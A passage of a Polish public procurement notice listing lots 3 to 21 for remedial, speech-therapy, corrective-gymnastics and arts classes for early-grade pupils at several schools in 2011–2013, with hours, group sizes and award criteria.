<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - Z. S. Nowa Wieś Lęborska..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Nowej Wsi Lęborskiej - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w łącznej liczbie godzin 70.
Zajęcia będą prowadzone dla 2 grup w roku szkolnym 2011/2012 oraz dla 2 kolejnych grup w roku szkolnym 2012/2013 -  każda grupa będzie liczyła po 4 uczniów. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23. 
Celem zajęć jest zmniejszenie dysfunkcji w zakresie wad wymowy. Leczenie zaburzeń mowy podczas zajęć ma zapobiec m.in. utrwalaniu się tzw. nieprawidłowych wzorców artykulacyjnych, a w konsekwencji obniżeniu poczucia własnej wartości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - Z. S. Łebień..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Łebieniu - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach  każda będzie liczyła po 8 uczniów - 1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23. 
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu mają być odpowiedzią na potrzeby stymulowania, usprawniania zaburzonych procesów psychomotorycznych istotnych w opanowaniu umiejętności czytania i pisania. Wczesna pomoc uczniom, którzy zostaną objęci wsparciem w ramach tych zajęć oraz zapewnienie dogodnych warunków przyswajania przez nich wiedzy w odpowiednim tempie pozwoli na niepogłębienie barier w opanowywaniu treści również z innych przedmiotów. Zajęcia mają wpłynąć na rozwój kompetencji kluczowej tj. porozumiewanie się językiem ojczystym.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  - Z. S.  Łebień..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Łebieniu - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów -  1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Zajęcia mają na celu zmniejszenie trudności w logicznym myśleniu, abstrahowaniu i rachunku pamięciowym tj. trudności w zdobywaniu umiejętności matematycznych u uczniów objętych wsparciem w ramach projektu. Zajęcia mają umożliwić zastosowanie wiedzy matematyczno - przyrodniczej do wyjaśniania zjawisk występujących  w otaczającej rzeczywistości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - Z. S. Łebień..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Łebieniu - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w łącznej liczbie godzin 70.
Zajęcia będą prowadzone dla 2 grup w roku szkolnym 2011/2012 oraz dla 2 kolejnych grup w roku szkolnym 2012/2013 -  każda grupa będzie liczyła po 4 uczniów. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Celem zajęć jest zmniejszenie dysfunkcji w zakresie wad wymowy. Leczenie zaburzeń mowy podczas zajęć ma zapobiec m.in. utrwalaniu się tzw. nieprawidłowych wzorców artykulacyjnych a w konsekwencji obniżeniu poczucia własnej wartości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy - Z. S. Łebień..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Łebieniu - Szkoła Podstawowa -  organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w łącznej liczbie godzin 70.
Zajęcia w każdym roku będą prowadzone w dwóch grupach, każda będzie liczyła po 15 uczniów - 1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Zajęciami z gimnastyki korekcyjnej zostaną objęci uczniowie z najpoważniejszymi wadami związanymi ze zmianą trybu życia, z przejściem z dużej swobody ruchu  na kilkugodzinne przebywanie w pozycji siedzącej. Udział w zajęciach mają wpłynąć na wzmocnienie gorsetu mięśniowego  oraz utrwalenie nawyku prawidłowej postawy ciała. Celem zajęć jest zmniejszenie dysfunkcji w zakresie wad postawy.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załącznik nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia rozwijające dla uczniów szczególnie uzdolnionych artystycznie  - Z. S. Łebień..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Łebieniu - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć rozwijających dla uczniów szczególnie uzdolnionych artystycznie  w łącznej liczbie godzin 70.
Zajęcia w każdym roku będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Udział w zajęciach ma umożliwić darmowy dostęp do zajęć artystycznych, rozwinąć umiejętności uczniów oraz ich talenty w zakresie nauk plastycznych. Udział w zajęciach ma zapobiec rozwijaniu patologii oraz zapobiec wykluczeniu społecznemu, a także wpłynąć na rozwój talentów i zainteresowań uczniów uzdolnionych artystycznie.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - Z. S. Garczegorze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Garczegorzu - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach: każda będzie liczyła po 8 uczniów - 1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu mają być odpowiedzią na potrzeby stymulowania, usprawniania zaburzonych procesów psychomotorycznych istotnych w opanowaniu umiejętności czytania i pisania. Wczesna pomoc uczniom, którzy zostaną objęci wsparciem w ramach tych zajęć oraz zapewnienie dogodnych warunków przyswajania przez nich wiedzy w odpowiednim tempie pozwoli na niepogłębienie barier w opanowywaniu treści również z innych przedmiotów. Zajęcia mają wpłynąć na rozwój kompetencji kluczowej tj. porozumiewanie się językiem ojczystym.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - Z. S.  Garczegorze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Garczegorzu - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów -   1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
	Zajęcia mają na celu zmniejszenie trudności w logicznym myśleniu, abstrahowaniu i rachunku pamięciowym tj. trudności w zdobywaniu umiejętności matematycznych u uczniów objętych wsparciem w ramach projektu. Zajęcia mają umożliwić zastosowanie wiedzy matematyczno - przyrodniczej do wyjaśniania zjawisk występujących w otaczającej rzeczywistości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - Z. S. Garczegorze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Garczegorzu - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w łącznej liczbie godzin 70.
Zajęcia będą prowadzone dla 2 grup w roku szkolnym 2011/2012 oraz dla 2 kolejnych grup w roku szkolnym 2012/2013 -  każda grupa będzie liczyła po 4 uczniów. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Celem zajęć jest zmniejszenie dysfunkcji w zakresie wad wymowy. Leczenie zaburzeń mowy podczas zajęć ma zapobiec m.in. utrwalaniu się tzw. nieprawidłowych wzorców artykulacyjnych a w konsekwencji obniżeniu poczucia własnej wartości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy - Z. S. Garczegorze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Garczegorzu - Szkoła Podstawowa -  organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w łącznej liczbie godzin 140.
Zajęcia będą prowadzone dla 2 grup w roku szkolnym 2011/2012 oraz dla 2 kolejnych grup w roku szkolnym 2012/2013 -  każda grupa będzie liczyła po 12 uczniów. Liczba godzin w roku 2012 wyniesie: 94 , natomiast w roku 2013  liczba godzin wyniesie 46.
	Zajęciami z gimnastyki korekcyjnej zostaną objęci uczniowie 
z najpoważniejszymi wadami związanymi ze zmianą trybu życia, z przejściem z dużej swobody ruchu  na kilkugodzinne przebywanie w pozycji siedzącej. Udział w zajęciach mają wpłynąć na wzmocnienie gorsetu mięśniowego  oraz utrwalenie nawyku prawidłowej postawy ciała. Celem zajęć jest zmniejszenie dysfunkcji w zakresie wad postawy.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu -- Z. S.  Leśnice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Leśnicach - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach: każda będzie liczyła po 8 uczniów - 1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu mają być odpowiedzią na potrzeby stymulowania, usprawniania zaburzonych procesów psychomotorycznych istotnych w opanowaniu umiejętności czytania i pisania. Wczesna pomoc uczniom, którzy zostaną objęci wsparciem w ramach tych zajęć oraz zapewnienie dogodnych warunków przyswajania przez nich wiedzy w odpowiednim tempie pozwoli na niepogłębienie barier w opanowywaniu treści również z innych przedmiotów. Zajęcia mają wpłynąć na rozwój kompetencji kluczowej tj. porozumiewanie się językiem ojczystym.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych -- Z. S.  Leśnice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Leśnicach - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów -  1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
	Zajęcia mają na celu zmniejszenie trudności w logicznym myśleniu, abstrahowaniu i rachunku pamięciowym tj. trudności w zdobywaniu umiejętności matematycznych u uczniów objętych wsparciem w ramach projektu. Zajęcia mają umożliwić zastosowanie wiedzy matematyczno - przyrodniczej do wyjaśniania zjawisk występujących w otaczającej rzeczywistości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zajęcia rozwijające dla uczniów szczególnie uzdolnionych artystycznie  -- Z. S.  Leśnice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III klas I-III Zespołu Szkół w Leśnicach - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć rozwijających dla uczniów szczególnie uzdolnionych artystycznie  w łącznej liczbie godzin 70.
Zajęcia w każdym roku szkolnym będą prowadzone w dwóch grupach, każda będzie liczyła po 4 uczniów - 1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Udział w zajęciach ma umożliwić darmowy dostęp do zajęć artystycznych, rozwinąć umiejętności uczniów oraz ich talenty w zakresie plastyki. Udział w zajęciach ma zapobiec rozwijaniu patologii oraz zapobiec wykluczeniu społecznemu a także wpłynąć na rozwój talentów i zainteresowań uczniów uzdolnionych artystycznie.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu-- Z. S.  Redkowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Redkowicach - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w łącznej liczbie godzin 140.
Zajęcia będą prowadzone dla 2 grup w roku szkolnym 2011/2012 oraz dla 2 kolejnych grup w roku szkolnym 2012/2013 -  każda grupa będzie liczyła po 8 uczniów. Liczba godzin w roku 2012 wyniesie: 94 , natomiast w roku 2013  liczba godzin wyniesie 46.
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu mają być odpowiedzią na potrzeby stymulowania, usprawniania zaburzonych procesów psychomotorycznych istotnych w opanowaniu umiejętności czytania i pisania. Wczesna pomoc uczniom, którzy zostaną objęci wsparciem w ramach tych zajęć oraz zapewnienie dogodnych warunków przyswajania przez nich wiedzy w odpowiednim tempie pozwoli na niepogłębienie barier w opanowywaniu treści również z innych przedmiotów. Zajęcia mają wpłynąć na rozwój kompetencji kluczowej tj. porozumiewanie się językiem ojczystym.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych -- Z. S.  Redkowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Redkowicach - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 140.
Zajęcia w roku szkolnym 2011/2012 będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów. Zajęcia w roku szkolnym 2012/2013 będą prowadzone w dwóch grupach, każda będzie liczyła po 9 uczniów. Liczba godzin w roku 2012 wyniesie: 94 , natomiast w roku 2013  liczba godzin wyniesie 46.
Zajęcia mają na celu zmniejszenie trudności w logicznym myśleniu, abstrahowaniu
 i rachunku pamięciowym tj. trudności w zdobywaniu umiejętności matematycznych u uczniów objętych wsparciem w ramach projektu. Zajęcia mają umożliwić zastosowanie wiedzy matematyczno - przyrodniczej do wyjaśniania zjawisk występujących w otaczającej rzeczywistości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy-- Z. S. Redkowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Redkowicach - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w łącznej liczbie godzin 70.
Zajęcia będą prowadzone dla 2 grup w roku szkolnym 2011/2012 oraz dla 2 kolejnych grup w roku szkolnym 2012/2013 -  każda grupa będzie liczyła po 4 uczniów. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Celem zajęć jest zmniejszenie dysfunkcji w zakresie wad wymowy. Leczenie zaburzeń mowy podczas zajęć ma zapobiec min. utrwalaniu się tzw. nieprawidłowych wzorców artykulacyjnych a w konsekwencji obniżeniu poczucia własnej wartości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zajęcia rozwijające dla uczniów  szczególnie uzdolnionych teatralnie  -- Z. S. Redkowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III klas I-III Zespołu Szkół w Redkowicach - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć rozwijających dla uczniów  szczególnie uzdolnionych teatralnie  w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach, każda będzie liczyła po 4 uczniów -  1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Udział w zajęciach ma umożliwić darmowy dostęp do zajęć artystycznych, rozwinąć umiejętności uczniów oraz ich talenty w zakresie zainteresowań teatralnych. Udział w zajęciach ma zapobiec rozwijaniu patologii oraz zapobiec wykluczeniu społecznemu, a także wpłynąć na rozwój talentów i zainteresowań uczniów uzdolnionych artystycznie.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu- S. P.  Tawęcino..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Szkoły Podstawowej w Tawęcinie  - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów -   1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu mają być odpowiedzią na potrzeby stymulowania, usprawniania zaburzonych procesów psychomotorycznych istotnych w opanowaniu umiejętności czytania i pisania. Wczesna pomoc uczniom, którzy zostaną objęci wsparciem w ramach tych zajęć oraz zapewnienie dogodnych warunków przyswajania przez nich wiedzy w odpowiednim tempie pozwoli na niepogłębienie barier w opanowywaniu treści również z innych przedmiotów. Zajęcia mają wpłynąć na rozwój kompetencji kluczowej tj. porozumiewanie się językiem ojczystym.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych-- S. P.   Tawęcino..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Szkoły Podstawowej w Tawęcinie  - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 70.
Zajęcia będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów -  1 gr./rok. Liczba godzin w roku 2012 wyniesie: 47 , natomiast w roku 2013  liczba godzin wyniesie 23.
	Zajęcia mają na celu zmniejszenie trudności w logicznym myśleniu, abstrahowaniu i rachunku pamięciowym tj. trudności w zdobywaniu umiejętności matematycznych u uczniów objętych wsparciem w ramach projektu. Zajęcia mają umożliwić zastosowanie wiedzy matematyczno - przyrodniczej do wyjaśniania zjawisk występujących w otaczającej rzeczywistości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
